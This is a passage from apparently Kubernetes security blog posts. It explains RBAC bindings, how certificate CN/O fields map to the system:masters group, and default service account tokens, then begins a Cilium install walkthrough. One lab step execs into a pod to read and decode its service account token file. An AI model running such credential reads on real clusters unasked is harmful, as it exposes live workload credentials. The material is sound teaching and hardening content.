matt@controlplane:~/rbac$ kubectl create rolebinding pod-read-access   --role=pod-reader   --user=lab-user
rolebinding.rbac.authorization.k8s.io/pod-read-access created
</code></pre>
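<p>Those two imperative commands are shorthand for manifests like these; you can confirm with <code>kubectl get role pod-reader -o yaml</code>:</p>
<pre><code class="lang-yaml">apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-reader
  namespace: default
rules:
- apiGroups: [""]          # "" is the core API group, where pods live
  resources: ["pods"]
  verbs: ["get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: pod-read-access
  namespace: default
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: pod-reader
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: User
  name: lab-user
</code></pre>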
<p><strong>Step 5 — Verify access</strong></p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl auth can-i list pods --as lab-user
yes
matt@controlplane:~/rbac$ kubectl --context lab-user@kubernetes get pods
NAME                        READY   STATUS    RESTARTS      AGE
flask-app-ccb7dbb5b-5x5qw   1/1     Running   4 (7m ago)    12d
nginx-676b6c5bbc-45cmn      1/1     Running   12 (7m ago)   130d
</code></pre>
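<p>To see everything lab-user can do in one shot, rather than one verb at a time, <code>kubectl auth can-i</code> also has a <code>--list</code> mode (output trimmed):</p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl auth can-i --list --as lab-user
Resources   Non-Resource URLs   Resource Names   Verbs
...
pods        []                  []               [get list]
...
</code></pre>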
<p>Now we have it working for pods in the default namespace, exactly as expected. That’s where AuthZ meets AuthN. I also can’t believe that nginx pod is still running.</p>
<hr />
<h2 id="heading-cluster-rbac">Cluster RBAC</h2>
<p>If you list your ClusterRoles, the output tells the story of your entire cluster:</p>
<pre><code class="lang-bash">kubectl get clusterroles
</code></pre>
<p>You’ll see something like:</p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl get clusterroles
NAME                                                                   CREATED AT
admin                                                                  2024-10-17T19:53:04Z
argocd-application-controller                                          2024-10-17T20:27:44Z
...
calico-webhook-reader                                                  2024-10-17T19:55:28Z
cluster-admin                                                          2024-10-17T19:53:04Z
edit                                                                   2024-10-17T19:53:04Z
...
system:certificates.k8s.io:kube-apiserver-client-kubelet-approver      2024-10-17T19:53:04Z
system:certificates.k8s.io:kubelet-serving-approver                    2024-10-17T19:53:04Z
system:controller:attachdetach-controller                              2024-10-17T19:53:04Z
system:controller:certificate-controller                               2024-10-17T19:53:04Z
...
system:kube-dns                                                        2024-10-17T19:53:04Z
system:kube-scheduler                                                  2024-10-17T19:53:04Z
...
system:node-bootstrapper                                               2024-10-17T19:53:04Z
...
</code></pre>
<p>Those entries generally come from three places:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Category</td><td>Example</td><td>Purpose</td></tr>
</thead>
<tbody>
<tr>
<td><strong>Built-in roles</strong></td><td><code>cluster-admin</code>, <code>edit</code></td><td>Human-facing defaults created by Kubernetes itself.</td></tr>
<tr>
<td><strong>System roles</strong></td><td><code>system:controller:*</code>, <code>system:node</code></td><td>Internal roles used by control-plane components and kubelets.</td></tr>
<tr>
<td><strong>Addon roles</strong></td><td><code>calico-*</code>, <code>argocd-*</code></td><td>Created by installed operators and charts.</td></tr>
</tbody>
</table>
</div><p>Each of these defines <strong>what</strong> actions are allowed (<code>verbs</code>) and <strong>where</strong> they apply (<code>resources</code>, <code>apiGroups</code>). Your authenticated user is matched to one of these via a <strong>RoleBinding</strong> or <strong>ClusterRoleBinding</strong>.</p>
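<p>Peeking inside one makes the shape clear. A minimal, hypothetical ClusterRole (not one of the built-ins above) that can read nodes cluster-wide would look like this:</p>
<pre><code class="lang-yaml">apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: node-reader        # hypothetical example name
rules:
- apiGroups: [""]          # "" is the core API group
  resources: ["nodes"]
  verbs: ["get", "list", "watch"]
</code></pre>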
<p>For example, the default bootstrap identity <code>kubernetes-admin</code> maps directly to the god-tier <code>cluster-admin</code> role:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">subjects:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">kind:</span> <span class="hljs-string">User</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">kubernetes-admin</span>
<span class="hljs-attr">roleRef:</span>
  <span class="hljs-attr">kind:</span> <span class="hljs-string">ClusterRole</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">cluster-admin</span>
</code></pre>
<p>That’s why everything “just works” in a fresh lab, but it also means you’re running as the same identity and privilege level as the cluster admin.</p>
<h3 id="heading-assigning-cluster-roles">Assigning Cluster Roles</h3>
<p>ClusterRoles define <em>what</em> can be done.  ClusterRoleBindings define <em>who</em> can do it.</p>
<p>You can see your bindings with:</p>
<pre><code class="lang-bash">kubectl get clusterrolebindings
</code></pre>
<p>Example from a kubeadm-based cluster:</p>
<pre><code class="lang-bash">kubeadm:cluster-admins                                          ClusterRole/cluster-admin                                                          253d
kubeadm:get-nodes                                               ClusterRole/kubeadm:get-nodes                                                      360d
kubeadm:kubelet-bootstrap                                       ClusterRole/system:node-bootstrapper                                               360d
kubeadm:node-autoapprove-bootstrap                              ClusterRole/system:certificates.k8s.io:certificatesigningrequests:nodeclient       360d
kubeadm:node-autoapprove-certificate-rotation                   ClusterRole/system:certificates.k8s.io:certificatesigningrequests:selfnodeclient   360d
kubeadm:node-proxier                                            ClusterRole/system:node-proxier                                                    360d
</code></pre>
<p>Each of these connects an identity (user, group, or service account) to a ClusterRole.</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Binding</td><td>Role</td><td>Subject</td><td>Purpose</td></tr>
</thead>
<tbody>
<tr>
<td><strong>kubeadm:cluster-admins</strong></td><td><code>cluster-admin</code></td><td>Group <code>kubeadm:cluster-admins</code></td><td>Grants full cluster-wide privileges.</td></tr>
<tr>
<td><strong>kubeadm:get-nodes</strong></td><td><code>kubeadm:get-nodes</code></td><td>Bootstrap group</td><td>Lets components read node info.</td></tr>
<tr>
<td><strong>kubeadm:kubelet-bootstrap</strong></td><td><code>system:node-bootstrapper</code></td><td><code>system:bootstrappers:kubeadm:default-node-token</code></td><td>Allows new nodes to register.</td></tr>
<tr>
<td><strong>kubeadm:node-autoapprove-bootstrap</strong></td><td><code>system:certificates.k8s.io:certificatesigningrequests:nodeclient</code></td><td><code>system:bootstrappers:kubeadm:default-node-token</code></td><td>Auto-approves node CSR during bootstrap.</td></tr>
<tr>
<td><strong>kubeadm:node-autoapprove-certificate-rotation</strong></td><td><code>system:certificates.k8s.io:certificatesigningrequests:selfnodeclient</code></td><td>Group <code>system:nodes</code></td><td>Lets kubelets rotate their client certs.</td></tr>
<tr>
<td><strong>kubeadm:node-proxier</strong></td><td><code>system:node-proxier</code></td><td>ServiceAccount <code>kube-system:kube-proxy</code></td><td>Lets <code>kube-proxy</code> manage endpoints and services.</td></tr>
</tbody>
</table>
</div><p>In short:</p>
<ul>
<li><p><strong>ClusterRoles</strong> define privileges.</p>
</li>
<li><p><strong>ClusterRoleBindings</strong> assign them to identities.</p>
</li>
<li><p>The API server enforces that mapping on every request.</p>
</li>
</ul>
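<p>In yaml terms, a ClusterRoleBinding is just the glue between a subject and a role. A sketch of a hypothetical binding that gives an <code>auditors</code> group the built-in read-only <code>view</code> role:</p>
<pre><code class="lang-yaml">apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: auditors-view            # hypothetical name
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: auditors                 # hypothetical group
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: view                     # built-in read-only ClusterRole
</code></pre>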
<h3 id="heading-following-the-binding-chain">Following the Binding Chain</h3>
<p>Now let’s dig into the default admin binding:</p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl describe clusterrolebinding kubeadm:cluster-admins
Name:         kubeadm:cluster-admins
Labels:       &lt;none&gt;
Annotations:  &lt;none&gt;
Role:
  Kind:  ClusterRole
  Name:  cluster-admin
Subjects:
  Kind   Name                    Namespace
  ----   ----                    ---------
  Group  kubeadm:cluster-admins
</code></pre>
<p>Notice it doesn’t bind to a <strong>specific user</strong> — instead, it references a <strong>group</strong> that the user belongs to.<br />In your lab, that group mapping comes from the <strong>client certificate</strong> issued during cluster bootstrap.</p>
<p>You can inspect it yourself:</p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl config view --minify --raw -o jsonpath=<span class="hljs-string">'{.users[0].user.client-certificate-data}'</span> | base64 -d | openssl x509 -noout -subject
subject=O = system:masters, CN = kubernetes-admin
</code></pre>
<p>Here’s what that means:</p>
<ul>
<li><strong>CN (Common Name)</strong> → your username, <code>kubernetes-admin</code></li>
<li><strong>O (Organization)</strong> → your group, <code>system:masters</code></li>
</ul>
<p>When the API server validates this certificate, it extracts both:</p>
<pre><code class="lang-bash">User:  CN=kubernetes-admin
Group: O=system:masters
</code></pre>
<p>That <code>system:masters</code> group is special: it’s automatically bound to the <code>cluster-admin</code> role by the default RBAC bootstrap bindings. In other words, anyone presenting a valid cert with <code>O=system:masters</code> skips straight to full admin rights. It’s convenient for bootstrapping, and that’s probably its only advantage.</p>
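<p>This is also why you shouldn’t hand out day-to-day certs with <code>O=system:masters</code>. As a sketch (hypothetical names), here’s how the CN and O fields get baked in when you generate a user key and CSR with <code>openssl</code>; the O becomes the group RBAC will match on:</p>
<pre><code class="lang-bash"># Generate a key and CSR for a least-privilege user.
# CN = username, O = group (both hypothetical values here).
openssl req -new -newkey rsa:2048 -nodes \
  -keyout lab-user2.key -out lab-user2.csr \
  -subj "/O=dev-team/CN=lab-user2"

# Confirm the identity fields the API server will read after signing:
openssl req -in lab-user2.csr -noout -subject
</code></pre>
<p>Sign that CSR with the cluster CA (or via a CertificateSigningRequest) and the resulting cert authenticates as <code>lab-user2</code> in group <code>dev-team</code> — no rights at all until you bind some.</p>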
<p>A quick peek at how <code>system:masters</code> gets those rights, via the <code>cluster-admin</code> <code>ClusterRoleBinding</code>:</p>
<pre><code class="lang-bash">matt@controlplane:~$ kubectl get clusterrolebinding cluster-admin -o yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  annotations:
    rbac.authorization.kubernetes.io/autoupdate: <span class="hljs-string">"true"</span>
  creationTimestamp: <span class="hljs-string">"2024-10-17T19:53:04Z"</span>
  labels:
    kubernetes.io/bootstrapping: rbac-defaults
  name: cluster-admin
  resourceVersion: <span class="hljs-string">"134"</span>
  uid: 640338d1-5f25-4c59-bdca-893969ecb818
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:masters
</code></pre>
<p>That’s how your identity maps to permissions:</p>
<pre><code class="lang-bash">kubernetes-admin (user)
  ↓
system:masters (group)
  ↓
ClusterRoleBinding cluster-admin
  ↓
ClusterRole cluster-admin
</code></pre>
<p>Visualized:</p>
<pre><code class="lang-bash">Certificate (CN/O) → Authenticated User/Group → ClusterRoleBinding → ClusterRole → Permissions
</code></pre>
<p>This is the complete <strong>auth-to-RBAC chain</strong> that Kubernetes walks through on every API request — from certificate identity to effective privileges.</p>
<hr />
<h2 id="heading-users-vs-service-accounts">Users vs. Service Accounts</h2>
<p>Until now we’ve been talking about <strong>users</strong> — real people (or certificates pretending to be). But what about all the API calls in Kubernetes that don’t come from humans, the ones that come from <strong>pods</strong>?</p>
<p>Pods use <strong>service accounts</strong> to authenticate. These are actual Kubernetes objects, not external identities.</p>
<h3 id="heading-users-vs-service-accounts-1">Users vs Service Accounts</h3>
<p>Here’s a quick side-by-side of users and service accounts.</p>
<p>Users:</p>
<ul>
<li>Represent <strong>humans</strong> (or external systems).</li>
<li><strong>Not stored</strong> in Kubernetes. You authenticate via certificates, tokens, or OIDC, and the API server simply trusts the identity its authenticator reports.</li>
<li>Example:<pre><code class="lang-bash">user=<span class="hljs-string">"kubernetes-admin"</span>
groups=[<span class="hljs-string">"system:masters"</span>,<span class="hljs-string">"system:authenticated"</span>]
</code></pre>
</li>
</ul>
<p>Service Accounts:</p>
<ul>
<li>Represent <strong>workloads</strong>.</li>
<li>Are <strong>real objects</strong> in the cluster:<pre><code class="lang-bash">kubectl get serviceaccounts -A
</code></pre>
</li>
<li>Live in namespaces, have tokens, and can be bound to Roles/ClusterRoles.</li>
<li>Example:<pre><code class="lang-bash">system:serviceaccount:default:myapp
</code></pre>
</li>
</ul>
<h3 id="heading-the-default-service-account">The Default Service Account</h3>
<p>Let’s take a look at one service account in detail: the default service account, using an nginx pod in the <code>default</code> namespace as our example.</p>
<p>Every namespace ships with a <code>default</code> ServiceAccount. If you don’t specify <code>serviceAccountName</code> in your Pod/Deployment, Kubernetes assigns <code>default</code> automatically and projects a short-lived JWT token into the pod.</p>
<p><strong>Verify the default SA exists (and why “Tokens: none” is normal now):</strong> since Kubernetes 1.24, long-lived token Secrets are no longer auto-created for service accounts, so <code>Tokens: &lt;none&gt;</code> is expected; pods get short-lived projected tokens instead.</p>
<pre><code class="lang-bash">matt@controlplane:~$ kubectl describe sa default -n default
Name:                default
Namespace:           default
Labels:              &lt;none&gt;
Annotations:         &lt;none&gt;
Image pull secrets:  &lt;none&gt;
Mountable secrets:   &lt;none&gt;
Tokens:              &lt;none&gt;
Events:              &lt;none&gt;
</code></pre>
<p><strong>Which SA is my nginx pod using?</strong> This will of course be different per test environment.</p>
<pre><code class="lang-bash">matt@controlplane:~$ kubectl get pod nginx-676b6c5bbc-45cmn -o jsonpath=<span class="hljs-string">'{.spec.serviceAccountName}'</span>
default
</code></pre>
<p><strong>See the live token in the pod (identity = service account):</strong></p>
<pre><code class="lang-bash">matt@controlplkubectl <span class="hljs-built_in">exec</span> -it nginx-676b6c5bbc-45cmn -- cat /var/run/secrets/kubernetes.io/serviceaccount/token/token
eyJhbGciOiJSUz...
</code></pre>
<p><strong>Decode the token payload locally (don’t upload it anywhere):</strong></p>
<pre><code class="lang-bash">TOKEN=<span class="hljs-string">'&lt;paste_the_value_above&gt;'</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">"<span class="hljs-variable">$TOKEN</span>"</span> | cut -d. -f2 | tr <span class="hljs-string">'_-'</span> <span class="hljs-string">'/+'</span> | base64 -d 2&gt;/dev/null | jq .
<span class="hljs-comment"># Look for:</span>
<span class="hljs-comment">#  "sub": "system:serviceaccount:default:default"</span>
<span class="hljs-comment">#  "iss": "https://kubernetes.default.svc.cluster.local"</span>
<span class="hljs-comment">#  "kubernetes.io": { "namespace": "default", "pod": { "name": "nginx-..." }, "serviceaccount": {"name":"default"} }</span>
</code></pre>
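<p>One gotcha: JWT segments are base64url with the padding stripped, which is why plain <code>base64 -d</code> sometimes complains. Here’s a self-contained demo of the round trip, using a fake payload rather than a real token:</p>
<pre><code class="lang-bash"># Fake claim set standing in for a real token payload:
PAYLOAD='{"sub":"system:serviceaccount:default:default"}'

# Encode it the way JWTs do: base64url alphabet, padding stripped.
SEG=$(printf '%s' "$PAYLOAD" | base64 | tr '+/' '-_' | tr -d '=\n')

# Decode: restore padding to a multiple of 4, map base64url back to base64.
PADDED="$SEG$(printf '%.*s' $(( (4 - ${#SEG} % 4) % 4 )) '===')"
DECODED=$(printf '%s' "$PADDED" | tr '-_' '+/' | base64 -d)
echo "$DECODED"
</code></pre>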
<p><strong>What can this identity actually do?</strong><br />There are two quick ways to check (without touching the pod):</p>
<p>1) <strong>From your admin shell, impersonate the SA for targeted checks:</strong></p>
<pre><code class="lang-bash">matt@controlplane:~$ kubectl auth can-i get secrets -n default --as system:serviceaccount:default:default
no
matt@controlplane:~$ kubectl auth can-i list pods -n default --as system:serviceaccount:default:default
no
</code></pre>
<p>2) <strong>Or list everything allowed in the namespace:</strong></p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl auth can-i --list -n default --as system:serviceaccount:default:default
Resources                                       Non-Resource URLs                      Resource Names   Verbs
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
globalnetworkpolicies.projectcalico.org         []                                     []               [get list watch create update patch delete deletecollection]
networkpolicies.projectcalico.org               []                                     []               [get list watch create update patch delete deletecollection]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/api/*]                               []               [get]
                                                [/apis/*]                              []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/readyz]                              []               [get]
                                                [/version]                             []               [get]
</code></pre>
<p><strong>Why your nginx can “see” discovery but not much else:</strong><br />You likely won’t find any RoleBinding/ClusterRoleBinding that names <code>system:serviceaccount:default:default</code> directly.  Instead, the default SA inherits low-risk capabilities via <strong>groups</strong> that all service accounts are in:</p>
<ul>
<li><code>system:authenticated</code></li>
<li><code>system:serviceaccounts</code></li>
<li><code>system:serviceaccounts:default</code></li>
</ul>
<p>Check the group-based bindings you have:</p>
<pre><code class="lang-bash">kubectl get clusterrolebindings -o json | jq -r <span class="hljs-string">'
  .items[] | select(.subjects != null) |
  select(any(.subjects[]?;
    (.kind=="Group") and
    (.name=="system:authenticated" or .name=="system:serviceaccounts" or .name=="system:serviceaccounts:default")
  )) |
  .metadata.name + " -&gt; " + .roleRef.kind + "/" + .roleRef.name
'</span>
<span class="hljs-comment"># e.g.</span>
<span class="hljs-comment"># system:discovery -&gt; ClusterRole/system:discovery</span>
<span class="hljs-comment"># system:basic-user -&gt; ClusterRole/system:basic-user</span>
<span class="hljs-comment"># system:public-info-viewer -&gt; ClusterRole/system:public-info-viewer</span>
</code></pre>
<p><strong>Interpretation:</strong></p>
<ul>
<li><strong><code>system:discovery</code></strong> → API discovery endpoints (<code>/api</code>, <code>/apis</code>, <code>/version</code>, etc.)</li>
<li><strong><code>system:basic-user</code></strong> → “who am I” checks (SelfSubjectAccessReview / RulesReview)</li>
<li><strong><code>system:public-info-viewer</code></strong> → limited non-sensitive reads</li>
<li>(Add-ons like Calico may add their own minimal reads)</li>
</ul>
<p><strong>Avoid the Default Lifestyle:</strong></p>
<p>If you want to avoid relying on the default service account, there are a couple of options.</p>
<ul>
<li>Set <code>serviceAccountName</code> explicitly per workload and bind the least privileges it needs.</li>
<li>Or disable auto-token mount when the pod doesn’t need the API:<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span> { <span class="hljs-attr">name:</span> <span class="hljs-literal">no</span><span class="hljs-string">-api</span> }
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">automountServiceAccountToken:</span> <span class="hljs-literal">false</span>
  <span class="hljs-attr">containers:</span> [{ <span class="hljs-attr">name:</span> <span class="hljs-string">c</span>, <span class="hljs-attr">image:</span> <span class="hljs-string">busybox</span>, <span class="hljs-attr">command:</span> [<span class="hljs-string">"sleep"</span>,<span class="hljs-string">"3600"</span>] }]
</code></pre>
</li>
</ul>
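<p>For the first option, a minimal sketch (hypothetical names) of a dedicated service account that can only read ConfigMaps in its namespace:</p>
<pre><code class="lang-yaml">apiVersion: v1
kind: ServiceAccount
metadata:
  name: myapp                    # hypothetical workload identity
  namespace: default
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: myapp-config-reader
  namespace: default
rules:
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: myapp-config-reader
  namespace: default
subjects:
- kind: ServiceAccount
  name: myapp
  namespace: default
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: myapp-config-reader
</code></pre>
<p>Point the workload at it with <code>serviceAccountName: myapp</code> and it authenticates as <code>system:serviceaccount:default:myapp</code> with exactly those rights.</p>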
<p>That’s how easy it can be to tighten up these little defaults.</p>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>Kubernetes makes access look deceptively simple. Just a <code>kubeconfig</code> here, a service account there. But under the hood it’s a stack of implicit trust.  </p>
<ul>
<li>The <strong>API server</strong> trusts the <strong>CA</strong> that signed your client certs.  </li>
<li><strong>RBAC</strong> trusts whatever identity that cert or token presents.  </li>
<li>And <strong>you</strong> trust that nobody else has the same file sitting on their laptop.</li>
</ul>
<p>In this post we walked from <strong>SSH on the node</strong> → <strong>kubeconfig certificates</strong> → <strong>RBAC bindings</strong> → <strong>default service accounts</strong>.  Each step added some structure but not much accountability. Kubernetes is excellent at verifying that <em>someone</em> has permission but it just doesn’t always know <em>who that someone actually is.</em></p>
<p>Kubernetes RBAC might be basic for many, but in my opinion it’s still worth exploring. Going through this deep dive actually taught me quite a bit, so I hope you found it helpful too.</p>
<p>Next up, we’ll look at a better way to manage all of this: <strong>Teleport</strong>, a way to bring short-lived, auditable identity into Kubernetes access without rewriting how you work. </p>
]]></content:encoded></item><item><title><![CDATA[Service Boundaries:  The Cilium Way]]></title><description><![CDATA[In Part 2 we leveled up from basic NetworkPolicy to better cluster-wide guardrails using Calico. With global defaults and flow logs, we built something that worked.
That’s a solid foundation. Sounds a bit like what I thought of Network Policies befor...]]></description><link>https://cloudsecburrito.com/service-boundaries-the-cilium-way</link><guid isPermaLink="true">https://cloudsecburrito.com/service-boundaries-the-cilium-way</guid><category><![CDATA[hubble]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[cilium]]></category><category><![CDATA[networkpolicy]]></category><category><![CDATA[Security]]></category><category><![CDATA[observability]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Tue, 07 Oct 2025 20:50:27 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1759870057849/8dc7d548-a9a4-4dd1-b079-132ec5c6fba3.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In <a target="_blank" href="https://cloudsecburrito.com/service-boundaries-scaling-with-calico">Part 2</a> we leveled up from basic <code>NetworkPolicy</code> to better cluster-wide guardrails using Calico. With global defaults and flow logs, we built something that worked.</p>
<p>That’s a solid foundation. Sounds a bit like what I thought of Network Policies before Calico. But let’s be honest, we’re still only seeing half the picture. Calico and native <code>NetworkPolicy</code> both stop at L4: ports, IPs, and namespaces. Useful, but blind to what’s actually happening inside the connection. Was that a harmless health check or an attacker probing?</p>
<p>This is where <a target="_blank" href="https://docs.cilium.io/en/stable/">Cilium</a> steps in. It takes the same “who can talk to whom” model and extends it into “what can they do once connected.”</p>
<ul>
<li><p>L7 enforcement for HTTP, gRPC, Kafka, and DNS.</p>
</li>
<li><p>Identity-aware policies that track labels, not IPs.</p>
</li>
<li><p>Hubble observability so you can see and debug traffic at every layer.</p>
</li>
</ul>
<p>In other words, Cilium isn’t replacing Calico — it’s turning your network policies into application-aware security. Think of it as moving from guardrails to actual understanding. Let's get to it.</p>
<blockquote>
<p>Quick note: you’re not going to run Calico and Cilium together. They’re both CNIs, and this series focuses on boundaries, not datapath diplomacy. If you’re already all-in on Calico, this post is more about curiosity than configuration.</p>
</blockquote>
<hr />
<h2 id="heading-what-the-hell-is-cilium">What the Hell Is Cilium?</h2>
<p>If you’ve spent any time around Kubernetes networking, you’ve seen <strong>Cilium</strong> pop up. Yes, I said that before about Calico, but it's true. I would describe it as the CNI for <em>cool kids</em>, exuding <em>eBPF</em> goodness. But strip away my sarcasm, and it's actually pretty interesting.</p>
<p>Cilium isn’t just a CNI plugin. It’s a <strong>networking, security, and observability platform</strong> built on the Linux kernel’s <a target="_blank" href="https://ebpf.io/"><strong>extended Berkeley Packet Filter (eBPF)</strong></a> technology. Instead of using traditional iptables chains or Calico’s Felix agent to program kernel rules, Cilium compiles policies directly into lightweight, event-driven eBPF programs. Check out the link if you need an eBPF primer.</p>
<p>At its core, Cilium provides three big things:</p>
<ul>
<li><p><strong>Networking</strong> — a full CNI that routes packets using eBPF.</p>
</li>
<li><p><strong>Security</strong> — identity-based rules that enforce at L3, L4, and now <strong>L7</strong>.</p>
</li>
<li><p><strong>Observability</strong> — deep visibility into traffic, powered by <strong>Hubble</strong>.</p>
</li>
</ul>
<p>Because enforcement happens in the kernel, Cilium can <strong>see and understand every packet and flow</strong>, not just the ones that bubble up through Kubernetes Services. That’s what makes features like L7-aware HTTP and DNS policies possible without something like a service mesh.</p>
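<p>To preview where we’re headed, here’s a sketch of an L7 rule based on the <code>CiliumNetworkPolicy</code> CRD. The labels match our test app, but treat it as illustrative, not final: it would let the frontend reach the API on port 80, yet only for <code>GET /healthz</code>:</p>
<pre><code class="lang-yaml">apiVersion: "cilium.io/v2"
kind: CiliumNetworkPolicy
metadata:
  name: api-l7-allow-healthz     # hypothetical name
  namespace: backend
spec:
  endpointSelector:
    matchLabels:
      app: api
  ingress:
  - fromEndpoints:
    - matchLabels:
        app: web
        "k8s:io.kubernetes.pod.namespace": frontend
    toPorts:
    - ports:
      - port: "80"
        protocol: TCP
      rules:
        http:                    # L7 filtering happens here
        - method: "GET"
          path: "/healthz"
</code></pre>
<p>Anything else on port 80 — other paths, other methods — would be rejected at L7, not just logged.</p>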
<p>If Calico was your <strong>scalable network policy engine</strong>, Cilium is your <strong>intelligent network policy engine</strong>. It understands <em>intent</em> and <em>context</em>, not just <em>ports and IPs</em>.</p>
<hr />
<h2 id="heading-deploying-cilium-arm-friendly-edition">Deploying Cilium (ARM-friendly edition)</h2>
<p>There are a few ways to set up Cilium for a lab. The easiest is to start with a fresh Ubuntu VM running Kubernetes 1.33. Talos is an option now, but we’ll stick with the usual full-control setup. You can follow along with the <a target="_blank" href="https://cloudsecburrito.com/from-scratch-to-cluster-kubernetes-on-mac-m1-with-utm">Kubernetes on Mac M1</a> article up to the point where we install Calico. Just swap the article’s Kubernetes 1.31 for 1.33 to keep things current.</p>
<p>Start by downloading the Cilium CLI and extracting it to <code>/usr/local/bin</code> for easy use. Note that we’re grabbing the ARM build; swap the artifact name if you’re on a different architecture.</p>
<pre><code class="lang-bash">matt@ciliumcontrolplane:~$ curl -L --remote-name https://github.com/cilium/cilium-cli/releases/latest/download/cilium-linux-arm64.tar.gz

sudo tar xzvf cilium-linux-arm64.tar.gz -C /usr/<span class="hljs-built_in">local</span>/bin
</code></pre>
<p>Then use the following to install Cilium.</p>
<pre><code class="lang-bash">matt@ciliumcontrolplane:~$ cilium install --version 1.16.5
ℹ️  Using Cilium version 1.16.5
🔮 Auto-detected cluster name: kubernetes
🔮 Auto-detected kube-proxy has been installed
</code></pre>
<p>And don’t forget to remove your taint if you’re doing this on a single-node cluster and haven’t already. I almost always forget this one.</p>
<pre><code class="lang-bash">matt@ciliumcontrolplane:~$ kubectl taint nodes --all node-role.kubernetes.io/control-plane-
</code></pre>
<p>You can verify everything’s up by checking that the Cilium components are running in the <code>kube-system</code> namespace — or by running a <code>cilium connectivity test</code>. (I tried the test; it tried my patience. I killed it.)</p>
<pre><code class="lang-bash">matt@ciliumcontrolplane:~$ kubectl get po -A
NAMESPACE     NAME                                         READY   STATUS    RESTARTS   AGE
kube-system   cilium-9vxrz                                 1/1     Running   0          88s
kube-system   cilium-envoy-rnfsc                           1/1     Running   0          88s
kube-system   cilium-operator-799f498c8-lm989              1/1     Running   0          88s
kube-system   coredns-674b8bbfcf-5lxq8                     1/1     Running   0          6m5s
kube-system   coredns-674b8bbfcf-92xvg                     1/1     Running   0          6m5s
kube-system   etcd-ciliumcontrolplane                      1/1     Running   0          6m12s
kube-system   kube-apiserver-ciliumcontrolplane            1/1     Running   0          6m13s
kube-system   kube-controller-manager-ciliumcontrolplane   1/1     Running   0          6m12s
kube-system   kube-proxy-v97vg                             1/1     Running   0          6m5s
kube-system   kube-scheduler-ciliumcontrolplane            1/1     Running   0          6m13s
</code></pre>
<p>Now we're ready to roll.</p>
<hr />
<h2 id="heading-from-install-to-insight-baseline-cilium-behavior">From Install to Insight — Baseline Cilium Behavior</h2>
<p>Now that Cilium’s up and running, let’s see what it actually does out of the box. Turns out <strong>not much</strong>. So the cool stuff has to wait a little. Like every other Kubernetes CNI, Cilium starts in “wide-open” mode until you tell it otherwise. No policies, no restrictions — a free-for-all. No different from Calico-world in this regard. Let’s verify that before we start locking things down.</p>
<h3 id="heading-baseline-connectivity-test">Baseline Connectivity Test</h3>
<p>We’ll use the same simple three-tier app we’ve been deploying since Part 1. Save the following as <code>test-app.yaml</code>. Yes, this is long.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Namespace</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">frontend</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">tier:</span> <span class="hljs-string">frontend</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Namespace</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">backend</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">tier:</span> <span class="hljs-string">backend</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Namespace</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">db</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">tier:</span> <span class="hljs-string">db</span>
